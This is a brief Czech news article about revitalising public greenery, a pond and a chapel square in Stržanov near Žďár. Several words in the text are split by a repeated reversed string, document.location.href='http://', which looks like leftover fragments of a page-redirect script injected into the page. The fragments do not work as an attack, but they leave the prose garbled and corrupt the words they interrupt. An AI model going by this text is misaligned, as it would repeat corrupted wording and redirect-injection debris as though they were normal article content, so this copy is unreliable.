Rainbow page separator

Stržanovská zeleň projde revitalizací do konce příštího roku

Úterý, 14. listopadu 2017

Zeleň

Stržanov / Za tři miliony korun provede specializovaná firma revitalizaci zeleně na veřejných prostranstvích v místní části Žďáru Stržanov. Hlavními kritérii při výběru byla podle vedení žďárské radnice rychlost a cena. Na ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to práce měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to získá až šedesátiprocentní dotaci. Navíc v osadě dojde i na další vylepšení.
„Dojde ještě k úpravě rybníčku a prostranství před kapličkou,“ uvedl starosta Žďáru Zdeněk Navrátil. Celkově tak veškeré práce vyjdou na čtyři miliony korun.
Některé činnosti, jako je například kácení, začnou již v zimních měsících, tedy v době vegetačního klidu dřevin, další práce budou pokračovat na jaře. Kompletně ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tová má být revitalizace veřejné zeleně a další úpravy na ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to projekt navazující do konce příštího roku.